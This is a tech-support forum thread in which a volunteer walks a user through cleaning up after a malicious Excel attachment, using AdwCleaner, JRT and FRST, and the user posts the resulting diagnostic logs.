Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

.xls file infected my computer


  • Please log in to reply

#1
mw201

mw201

    Member

  • Member
  • PipPip
  • 15 posts

Hi!

 

I recently received a file attached to the work invitation from upwork website and I accidentally opened it. It was a .xls file. The next day I was notified by upwork that the file contained a virus. It infected my computer and avast antivirus could not detect it. I tried to delete the file but it didn't help. what are my options?


  • 0

Advertisements


#2
RKinner

RKinner

    Malware Expert

  • Expert
  • 20,031 posts
  • MVP
 
Download : ADWCleaner to your desktop.  Make sure you get the correct Download button.  Sometimes the ads on BleepingComputer will mimic the real Download button which should say: Download Now @BleepingComputer
 
NOTE: If using Internet Explorer and you get an alert that stops the program downloading, click on the warning and allow the download to complete.
 
Close  all programs, pause your anti-virus and run AdwCleaner (Vista or Win 7 => right click and Run As Administrator).
 
scan-results.jpg
 
Click on Scan  and follow the prompts. Let it run unhindered. When done, click on the Clean button, and follow the prompts. Allow the system to reboot. You will then be presented with the report. Copy & Paste this report on your next reply.
 
The report will be saved in the C:\AdwCleaner folder.
 
 
 
Junkware-Removal-Tool
 
Please download Junkware Removal Tool to your desktop.  Make sure you get the correct Download button.  Sometimes the ads on BleepingComputer will mimic the real Download button which should say: Download Now @Author's site
  • Pause your anti-virus.  Close all browsers.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
  •  
     
     
    •  
  • Get FRST from http://www.bleepingc...very-scan-tool/You need to download the appropriate tool for your PC.  If you don't know if you have a 32 or 64 bit system get them both.  Only one will work and that's the right one.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer. 
  • Check the Addition.txt box
  • Press Scan button. 
  • It will produce a log called FRST.txt in the same directory the tool is run from.  
  • Please copy and paste log back here. 
  • It will generate another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply. 

    • 0

    #3
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    Thank you for your post, RKinner!

    Here is what I have from ADWCleaner:

     

    # AdwCleaner v6.042 - Logfile created 01/02/2017 at 17:06:32
    # Updated on 06/01/2017 by Malwarebytes
    # Database : 2017-01-06.1 [Local]
    # Operating System : Windows 10 Home  (X64)
    # Username : Joseph - JOSEPHW
    # Running from : C:\Users\Joseph\Downloads\AdwCleaner.exe
    # Mode: Scan
     
     
     
    ***** [ Services ] *****
     
    No malicious services found.
     
     
    ***** [ Folders ] *****
     
    No malicious folders found.
     
     
    ***** [ Files ] *****
     
    No malicious files found.
     
     
    ***** [ DLL ] *****
     
    No malicious DLLs found.
     
     
    ***** [ WMI ] *****
     
    No malicious keys found.
     
     
    ***** [ Shortcuts ] *****
     
    No infected shortcut found.
     
     
    ***** [ Scheduled Tasks ] *****
     
    Task Found:  6ov
     
     
    ***** [ Registry ] *****
     
    No malicious registry entries found.
     
     
    ***** [ Web browsers ] *****
     
    No malicious Firefox based browser items found.
    No malicious Chromium based browser items found.
     
    *************************
     
    C:\AdwCleaner\AdwCleaner[S0].txt - [978 Bytes] - [01/02/2017 17:06:32]
     
    ########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1050 Bytes] ##########
     
     
     
     
     
     
     
    Junkware Removal Tool
     
    the firs time I run this I thought I accidentally close it before it finished scan so I run it 2 times. here is the contents of the file produced:
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.1.0 (12.05.2016)
    Operating System: Windows 10 Home x64 
    Ran by Joseph (Administrator) on Wed 02/01/2017 at 17:24:32.50
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
     
     
    File System: 0 
     
     
     
     
    Registry: 0 
     
     
     
     
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on Wed 02/01/2017 at 17:27:48.55
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
    Farbar Recovery Scan Tool
     
    First:
     
    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
    Ran by Joseph (administrator) on JOSEPHW (01-02-2017 17:45:56)
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
     
    ==================== Processes (Whitelisted) =================
     
    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
     
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
    (Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
    (Intel Corporation) C:\Windows\System32\ibtsiva.exe
    (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
    Failed to access process -> IntelCpHDCPSvc.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
    (WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
    (HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
    (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
    (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
    (Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    () C:\Users\Joseph\Downloads\AdwCleaner.exe
    () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
    (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdwtxcr.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
    (Microsoft Corporation) C:\Windows\System32\smartscreen.exe
     
    ==================== Registry (Whitelisted) ====================
     
    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
     
    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
    ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
     
    ==================== Internet (Whitelisted) ====================
     
    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
     
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1
     
    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
    BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
    BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
    Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
     
    FireFox:
    ========
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
    FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
    FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
    FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
     
    Chrome: 
    =======
    CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
    CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
    CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
    CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
    CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
    CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
    CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
    CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
    CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
    CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
     
    ==================== Services (Whitelisted) ====================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
    S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
    R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
    R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
    R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
    R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
    R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
    S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
    S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
    R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
    R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
    R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
    R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-01-11] (Bitdefender)
    R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
    S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
     
    ===================== Drivers (Whitelisted) ======================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
    R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
    S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
    R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
    R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
    R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
    R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
    R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
    R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
    R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-01-24] (Malwarebytes)
